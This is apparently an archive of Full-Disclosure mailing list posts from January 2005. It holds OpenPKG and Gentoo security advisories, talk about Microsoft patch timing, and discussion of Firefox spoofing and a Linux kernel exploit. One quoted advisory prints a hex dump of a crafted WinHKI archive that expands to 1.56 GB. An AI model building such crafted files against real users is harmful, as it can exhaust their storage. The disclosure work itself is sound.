  (see Solution) [3][4].

Solution:
  Select the updated source RPM appropriate for your OpenPKG release
  [5][6], fetch it from the OpenPKG FTP service [7][8] or a mirror
  location, verify its integrity [9], build a corresponding binary RPM
  from it [3] and update your OpenPKG installation by applying the
  binary RPM [4]. For the most recent release OpenPKG 2.2, perform the
  following operations to permanently fix the security problem (for
  other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/2.2/UPD
  ftp> get perl-5.8.5-2.2.1.src.rpm
  ftp> bye
  $ <prefix>/bin/openpkg rpm -v --checksig perl-5.8.5-2.2.1.src.rpm
  $ <prefix>/bin/openpkg rpm --rebuild perl-5.8.5-2.2.1.src.rpm
  $ su -
  # <prefix>/bin/openpkg rpm -Fvh <prefix>/RPM/PKG/perl-5.8.5-2.2.1.*.rpm
________________________________________________________________________

References:
  [0] http://www.perl.com/
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0452
  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0976
  [3] http://www.openpkg.org/tutorial.html#regular-source
  [4] http://www.openpkg.org/tutorial.html#regular-binary
  [5] ftp://ftp.openpkg.org/release/2.2/UPD/perl-5.8.5-2.2.1.src.rpm
  [6] ftp://ftp.openpkg.org/release/2.1/UPD/perl-5.8.4-2.1.1.src.rpm
  [7] ftp://ftp.openpkg.org/release/2.2/UPD/
  [8] ftp://ftp.openpkg.org/release/2.1/UPD/
  [9] http://www.openpkg.org/security.html#signature
________________________________________________________________________

For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <openpkgopenpkg.org>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/
for details on how to verify the integrity of this advisory.
________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Comment: OpenPKG <openpkgopenpkg.org>

iD8DBQFB4+wMgHWT4GPEy58RAmB8AJ9RXjXuF4foXhhDAvR4KRRJ31dUBwCg6pRb
TZQ44p6zfBdfieRvvcf3QLo=
=CkBO
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: Mike Diack (mike_diackhotmail.com)
Date: Tue Jan 11 2005 - 09:13:45 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Where are they?
Mike
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-19 ] imlib2: Buffer overflows in image decoding

From: Dan Margolis (krispykringlegentoo.org)
Date: Tue Jan 11 2005 - 09:38:31 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: imlib2: Buffer overflows in image decoding
      Date: January 11, 2005
      Bugs: #77002
        ID: 200501-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple overflows have been found in the imlib2 library image decoding
routines, potentially allowing the execution of arbitrary code.

Background
==========

imlib2 is an advanced replacement for image manipulation libraries such
as libXpm. It is utilized by numerous programs, including gkrellm and
several window managers, to display images.

Affected packages
=================

Description
===========

Pavel Kankovsky discovered that several buffer overflows found in the
libXpm library (see GLSA 200409-34) also apply to imlib (see GLSA
200412-03) and imlib2. He also fixed a number of other potential
security vulnerabilities.

Impact
======

A remote attacker could entice a user to view a carefully-crafted image
file, which would potentially lead to the execution of arbitrary code
with the rights of the user viewing the image. This affects any program
that utilizes of the imlib2 library.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All imlib2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/imlib2-1.2.0"

References
==========

  [ 1 ] CAN-2004-1026
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1026
  [ 2 ] GLSA 200412-03
        http://security.gentoo.org/glsa/glsa-200412-03.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-19.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iQEVAwUBQePy97DO2aFJ9pv2AQJGyAf8DxZUXi/5+iSyczibsXLjgXJXUh5ydqxu
m/n9r2YG87YENlH919ibeWomqoJulrybqIjIefeSCAZqg1jBWQFJXkBg0JVDXreL
cj1qYmcZbZpn2qS92DOZhkFp4eiyO2Gkb227yegC32RhzNgGp402ll02+JNrEejP
OeEDNFmOMVBO3/mP7yO/Jz8YogZBpN2gpCraToILsQXe8TFUDSQ4hhrd7Q1d/BQ5
fxvkm4YQs0oc8PmHEtZTrf2QoHDd95Isrj+oEi6AAydQreFwZ01po0ROSfX16uVT
UORQ42tIgrrkjrfwGQJxKJBQ7Y0h7melJ3Kx/z58wJk/FsKLqV0sSg==
=IZSV
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

From: James Greenhalgh (james.greenhalghworldpay.com)
Date: Tue Jan 11 2005 - 09:47:09 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Soderland, Craig wrote:
> This does not work if you are using the FireFox 1.0 tabbed browsing
> feature, as your pop up window simply opens a new tab, and it then
> becomes immediately obvious what you are trying to pull off here.

It also doesn't work on non-Windows or with non-default colours.

Really - this is more a window management thing surely? If someone fell
for this, they'd deserve it to be honest.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: Rafel Ivgi (rivgifinjan.com)
Date: Tue Jan 11 2005 - 09:44:40 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The original file wasn't a 1.56 with null that were compressed, it was a
smal file with 1024 FF's which was extracted to a
1.56 of nulls...that is not obvious, that is a bug.

Rafel Ivgi
Security Consultant

----- Original Message -----
From: "bipin gautam" <visitbipinyahoo.com>
To: <full-disclosurelists.netsys.com>
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

> that's obvious isn't it... say... if you create a few
> GB file with null characters, 0X00 and compress
> it...... that will produce a similar result. such
> issue is known for any file compress utility for ages.
>
>
> any... software will do the same! try it. and THAT'S
> OBVIOUS!
> --- "Rafel Ivgi, The-Insider" <theinsider012.net.il>
> wrote:
>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> Application: WinHKI
>> Vendors: http://www.webtoolmaster.com
>> Versions: 1.4d
>> Platforms: Windows
>> Bug: ARC File Extraction of 1KB to 1.56GB
>> Exploitation: Local (extract file)
>> Date: 24 Dec 2004
>> Author: Rafel Ivgi, The-Insider
>> E-Mail: the_insidermail.com
>> Website: http://theinsider.deep-ice.com
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> 1) Introduction
>> 2) Bugs
>> 3) The Code
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===============
>> 1) Introduction
>> ===============
>>
>> WinHKI is a file archiever which supports: ARC, BH,
>> CAB, HKI, JAR, LHA,TAR,
>>
>> GZ compressions.
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ======
>> 2) Bug
>> ======
>>
>> This is a normal CAB compressed file header
>>
>> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
>> ..251.HTM.^^^^^.
>> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363
>> ...x19s......<sc
>> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73
>> ript.>alert()</s
>> 00000030 6372 6970 743E 0D0A 1A00
>> cript>....
>>
>> By adding after the filename header a certain amount
>> of chars
>> and replacing all nulls (00) with FF (in order to
>> avoid our
>> long string from being terminated)
>>
>> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
>> ..251.HTM.^^^^^.
>> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B
>> ................
>> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363
>> ...x19s......<sc
>> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73
>> ript.>alert()</s
>> 00000430 6372 6970 743E 0D0A 1A00
>> cript>....
>>
>>
>> HKI will create a 1.56 GIGA BYTE file on at the
>> selected extract location.
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===========
>> 3) The Code
>> ===========
>>
>> An online proof of concept can be found at:
>> http://theinsider.deep-ice.com/hki156gb.ARC
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ---
>> Rafel Ivgi, The-Insider
>> http://theinsider.deep-ice.com
>>
>> "Scripts and Codes will make me D.O.S , but they
>> will never HACK me."
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.netsys.com/full-disclosure-charter.html
>>
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Mail - Easier than ever with enhanced search. Learn more.
> http://info.mail.yahoo.com/mail_250
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [gentoo-announce] [ GLSA 200501-20 ] o3read: Buffer overflow during file conversion

From: Thierry Carrez (koongentoo.org)
Date: Tue Jan 11 2005 - 10:14:40 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: o3read: Buffer overflow during file conversion
      Date: January 11, 2005
      Bugs: #74478
        ID: 200501-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in o3read allows an attacker to execute arbitrary
code by way of a specially crafted XML file.

Background
==========

o3read is a standalone converter for OpenOffice.org files. It allows a
user to dump the contents tree (o3read) and convert to plain text
(o3totxt) or to HTML (o3tohtml) Writer and Calc files.

Affected packages
=================

Description
===========

Wiktor Kopec discovered that the parse_html function in o3read.c copies
any number of bytes into a 1024-byte t[] array.

Impact
======

Using a specially crafted file, possibly delivered by e-mail or over
the Web, an attacker may execute arbitrary code with the permissions of
the user running o3read.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All o3read users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/o3read-0.0.4"

References
==========

  [ 1 ] CAN-2004-1288
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1288
  [ 2 ] Wiktor Kopec advisory
        http://tigger.uic.edu/~jlongs2/holes/o3read.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-20.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/pgp-signature attachment: OpenPGP digital signature

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: Matt Ostiguy (ostiguygmail.com)
Date: Tue Jan 11 2005 - 10:06:41 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 11 Jan 2005 15:13:45 -0000, Mike Diack <mike_diackhotmail.com> wrote:
> Where are they?
> Mike
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

From: Gaz Wilson (dragondragons.org.uk)
Date: Tue Jan 11 2005 - 10:07:21 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 11 Jan 2005, Athanasius wrote:

> On Tue, Jan 11, 2005 at 07:56:32AM +0000, Marcy Darcy wrote:
> > I'm running a small server with the 2.6.10 kernel.
> >
> > The exploit doesen't seem to be working on this kernel. Is there a way
> > to make sure the sistem is vulnerable or not?
>
> I couldn't get the exploit to work for 2.6.10 either. First there's
> changing a struct in it to user_desc to make it compile, then it just
> SEGVs all the time here.

I get it compiled and running on 2.6.8, but it doesn't do anything, other
than hog all available CPU for about 10-15 minutes followed by:

[-] FAILED: try again (-f switch) and again (Cannot allocate memory)
Killed

The same thing happens with the -f switch, except the process gets stopped
(SIGSTOP) instead of killed after the alloted time.

--
/ Gary Wilson, aka dragon/dragonlord/dragonv480 \
.'(_.------. e: dragonnorthernscum.org.uk MSN: dragonv480 .------._)`.
< _ | Skype:dragonv480 ICQ:342070475 AIM:dragonv480 | _ >
`.( `------' w: http://volvo480.northernscum.org.uk `------' ).'
\ w: http://www.northernscum.org.uk /
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: Vincent Archer (vardeny-all.com)
Date: Tue Jan 11 2005 - 10:11:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-20 ] o3read: Buffer overflow during file conversion

From: Thierry Carrez (koongentoo.org)
Date: Tue Jan 11 2005 - 10:14:40 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  Severity: Normal
     Title: o3read: Buffer overflow during file conversion
      Date: January 11, 2005
      Bugs: #74478
        ID: 200501-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in o3read allows an attacker to execute arbitrary
code by way of a specially crafted XML file.

Background
==========

o3read is a standalone converter for OpenOffice.org files. It allows a
user to dump the contents tree (o3read) and convert to plain text
(o3totxt) or to HTML (o3tohtml) Writer and Calc files.

Affected packages
=================

Description
===========

Wiktor Kopec discovered that the parse_html function in o3read.c copies
any number of bytes into a 1024-byte t[] array.

Impact
======

Using a specially crafted file, possibly delivered by e-mail or over
the Web, an attacker may execute arbitrary code with the permissions of
the user running o3read.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All o3read users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/o3read-0.0.4"

References
==========

  [ 1 ] CAN-2004-1288
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1288
  [ 2 ] Wiktor Kopec advisory
        http://tigger.uic.edu/~jlongs2/holes/o3read.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-20.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/pgp-signature attachment: OpenPGP digital signature

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: vh (vhhelith.net)
Date: Tue Jan 11 2005 - 10:38:09 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 11 Jan 2005 15:13:45 -0000
"Mike Diack" <mike_diackhotmail.com> wrote:

> Where are they?
> Mike

Start using OpenSource-OSs then you would be able to write the patches
yourself if nobody cares for the security-holes.
Microsoft don't care for ANY guy who buy an MS-OS if this guy is no CEO
or any other person of any big company.

Don't count the patches...
Count the security holes they didn't patched.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (OpenBSD)

iD8DBQFB5AD2Lj8RCVqWtskRAsf1AKCRugCTvqRX4C1r61iXk3jdfNVwmACfSypZ
LKknYDVTPBMmz6ePNGy748Y=
=hhAw
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

From: Handy, Mark (IT) (Mark.Handymorganstanley.com)
Date: Tue Jan 11 2005 - 10:42:56 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It is Tuesday.

As mentioned before, mid-afternoon EST

-----Original Message-----
From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of Vincent
Archer
Sent: 11 January 2005 11:11
To: Mike Diack
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--------------------------------------------------------

NOTICE: If received in error, please destroy and notify sender. Sender does not waive confidentiality or privilege, and use is prohibited.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-21 ] HylaFAX: hfaxd unauthorized login vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Tue Jan 11 2005 - 10:34:44 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: HylaFAX: hfaxd unauthorized login vulnerability
      Date: January 11, 2005
      Bugs: #75941
        ID: 200501-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

HylaFAX is subject to a vulnerability in its username matching code,
potentially allowing remote users to bypass access control lists.

Background
==========

HylaFAX is a software package for sending and receiving facsimile
messages.

Affected packages
=================

Description
===========

The code used by hfaxd to match a given username and hostname with an
entry in the hosts.hfaxd file is insufficiently protected against
malicious entries.

Impact
======

If the HylaFAX installation uses a weak hosts.hfaxd file, a remote
attacker could authenticate using a malicious username or hostname and
bypass the intended access restrictions.

Workaround
==========

As a workaround, administrators may consider adding passwords to all
entries in the hosts.hfaxd file.

Resolution
==========

All HylaFAX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/hylafax-4.2.0-r2"

Note: Due to heightened security, weak entries in the hosts.hfaxd file
may no longer work. Please see the HylaFAX documentation for details of
accepted syntax in the hosts.hfaxd file.

References
==========

  [ 1 ] CAN-2004-1182
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1182
  [ 2 ] HylaFAX Announcement
        http://marc.theaimsgroup.com/?l=hylafax&m=110545119911558&w=2

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-21.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/pgp-signature attachment: OpenPGP digital signature

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

From: Larry Seltzer (larrylarryseltzer.com)
Date: Tue Jan 11 2005 - 10:49:52 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Tuesday, 1PM eastern

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Firespoofing [Firefox 1.0]

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Tue Jan 11 2005 - 11:29:56 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

James Greenhalgh <james.greenhalghworldpay.com> wrote:

> It also doesn't work on non-Windows or with non-default colours.

Didn't work for Windows with default colours for me either; the real
dialogue box jumped to the front. I am still on a nightly just before
the 1.0 release though, and I believe it to be possible in theory. It
could also, I think, be made to work without the 'browsing full screen'
requirement.

> Really - this is more a window management thing surely? If someone fell
> for this, they'd deserve it to be honest.

It's window management, yeah, probably applicable to other browsers too,
and not nearly as bad as the IE chromeless window stuff because you do
get those extra couple of pixels of window edge to clue you in. But it's
still not good.

The real solution is to force toolbar+menubar+addrtessbar on for all
JavaScript pop-ups, at least as a default option setting. This would
also fix the recently publicised problem with targeting other sites'
pop-up windows for phishing.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [gentoo-announce] [ GLSA 200501-21 ] HylaFAX: hfaxd unauthorized login vulnerability

From: Thierry Carrez (koongentoo.org)
Date: Tue Jan 11 2005 - 10:34:44 CST

